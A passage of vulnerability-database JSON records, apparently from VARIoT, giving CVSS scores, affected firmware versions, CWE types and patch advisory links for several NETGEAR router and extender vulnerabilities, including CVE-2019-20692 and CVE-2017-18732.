"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015465",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2020-30757",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20692",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20692",
"impactScore": 5.5,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015465",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20692",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20692",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015465",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-30757",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1276",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1276"
},
{
"db": "NVD",
"id": "CVE-2019-20692"
},
{
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250 is a wireless router of NETGEAR. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20692"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "CNVD",
"id": "CNVD-2020-30757"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20692",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-30757",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1276",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1276"
},
{
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"id": "VAR-202004-0901",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
}
],
"trust": 1.1024362164864865
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
}
]
},
"last_update_date": "2024-11-23T22:25:33.066000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Stack Overflow on Some Routers, Gateways, and Extenders, PSV-2017-2014",
"trust": 0.8,
"url": "https://kb.netgear.com/000061447/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2014"
},
{
"title": "Patch for Multiple NETGEAR product buffer overflow vulnerabilities (CNVD-2020-30757)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/219507"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=114774"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1276"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20692"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061447/security-advisory-for-pre-authentication-stack-overflow-on-some-routers-gateways-and-extenders-psv-2017-2014"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20692"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1276"
},
{
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1276"
},
{
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1276"
},
{
"date": "2020-04-16T19:15:23.493000",
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-30757"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015465"
},
{
"date": "2020-04-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1276"
},
{
"date": "2024-11-21T04:39:05.843000",
"db": "NVD",
"id": "CVE-2019-20692"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015465"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1276"
}
],
"trust": 0.6
}
}
var-202004-1415
Vulnerability from variot
Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14. NETGEAR R6300v2 , PLW1000v2 , PLW1010v2 There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6300, etc. are all products of NETGEAR. NETGEAR R6300 is a wireless router. NETGEAR PLW1000 is a power line communication modem. NETGEAR PLW1010 is a power line communication modem.
NETGEAR R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14 have authorization issue vulnerabilities
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1415",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "plw1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.14"
},
{
"model": "plw1010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.14"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "plw1000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.14"
},
{
"model": "plw1010",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.14"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "plw1000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.14"
},
{
"model": "plw1010v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.14"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:plw1000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:plw1010_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
}
]
},
"cve": "CVE-2017-18732",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18732",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014857",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-52565",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18732",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18732",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014857",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18732",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18732",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014857",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-52565",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2010",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2010"
},
{
"db": "NVD",
"id": "CVE-2017-18732"
},
{
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14. NETGEAR R6300v2 , PLW1000v2 , PLW1010v2 There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6300, etc. are all products of NETGEAR. NETGEAR R6300 is a wireless router. NETGEAR PLW1000 is a power line communication modem. NETGEAR PLW1010 is a power line communication modem. \n\r\n\r\nNETGEAR R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14 have authorization issue vulnerabilities",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18732"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "CNVD",
"id": "CNVD-2021-52565"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18732",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-52565",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2010",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2010"
},
{
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"id": "VAR-202004-1415",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
}
],
"trust": 1.38329484
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
}
]
},
"last_update_date": "2024-11-23T21:59:20.395000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Authentication Bypass on R6300v2, PLW1000v2, and PLW1010v2, PSV-2016-0069",
"trust": 0.8,
"url": "https://kb.netgear.com/000051523/Security-Advisory-for-Authentication-Bypass-on-R6300v2-PLW1000v2-and-PLW1010v2-PSV-2016-0069"
},
{
"title": "Patch for NETGEAR R6300, PLW1000 and PLW1010 authorization issue vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/279671"
},
{
"title": "NETGEAR R6300 , PLW1000 and PLW1010 Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116770"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2010"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18732"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051523/security-advisory-for-authentication-bypass-on-r6300v2-plw1000v2-and-plw1010v2-psv-2016-0069"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18732"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2010"
},
{
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2010"
},
{
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2010"
},
{
"date": "2020-04-23T17:15:11.613000",
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-52565"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014857"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2010"
},
{
"date": "2024-11-21T03:20:46.763000",
"db": "NVD",
"id": "CVE-2017-18732"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2010"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014857"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2010"
}
],
"trust": 0.6
}
}
var-202004-1570
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects R6700 before 1.0.1.48, R7900 before 1.0.2.16, R6900 before 1.0.1.48, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R7000 before 1.0.9.34, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R7900P before 1.4.1.24, R8500 before 1.0.2.122, R8300 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, EX3700 before 1.0.0.72, EX3800 before 1.0.0.72, EX6000 before 1.0.0.32, EX6100 before 1.0.2.24, EX6120 before 1.0.0.42, EX6130 before 1.0.0.24, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, D7000v2 before 1.0.0.51, D6220 before 1.0.0.46, D6400 before 1.0.0.82, and D8500 before 1.0.3.42. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6700, etc. are all products of NETGEAR. NETGEAR R6700 is a wireless router. NETGEAR R7900 is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
